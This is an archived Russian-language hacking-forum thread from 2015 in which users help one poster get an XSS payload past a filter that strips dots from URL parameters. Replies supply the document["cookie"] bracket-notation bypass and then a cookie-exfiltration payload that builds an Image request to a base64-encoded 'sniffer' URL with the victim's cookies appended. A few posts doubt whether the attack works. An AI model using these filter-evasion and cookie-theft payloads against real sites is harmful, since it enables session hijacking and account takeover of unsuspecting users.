Фильтрация точки в запросе [Архив]

Просмотр полной версии : Фильтрация точки в запросе

Ditss

05.11.2015, 18:00

Здравствуйте все! Можно как-то обойти фильтрацию точки в запросе?

Есть запрос

/index.php?p=">alert(document.cookie)

Но точка в document.cookie фильтруется... ( Пробовал вставлять ASCII коды точки, но фильтр и на них...

Заранее спасибо!

faza02

05.11.2015, 18:25

document["cookie"]

M_script

06.11.2015, 08:57

↑ (https://antichat.live/posts/3911597/)
Попробуй вот так

Можете привести пример уязвимого кода, где сработает такая атака?

Altai

06.11.2015, 09:51

↑ (https://antichat.live/posts/3911821/)
Можете привести пример уязвимого кода, где сработает такая атака?

я не внимательно прочитал вопрос Согласен, фигню сказал

Ditss

06.11.2015, 12:50

↑ (https://antichat.live/posts/3911522/)
document["cookie"]

Спасибо, так работает! А если нужно сделать так:

">

как подменять точки в строке адреса?

faza02

06.11.2015, 13:12

↑ (https://antichat.live/posts/3911886/)
Спасибо, так работает! А если нужно сделать так:

">

как подменять точки в строке адреса?

(new Image())["src"]=atob("lol")+document["cookie"]

где lol - ссылка на сниффер в base64

M_script

06.11.2015, 14:49

↑ (https://antichat.live/posts/3911886/)

">

Этот код не будет работать даже без фильтрации точек.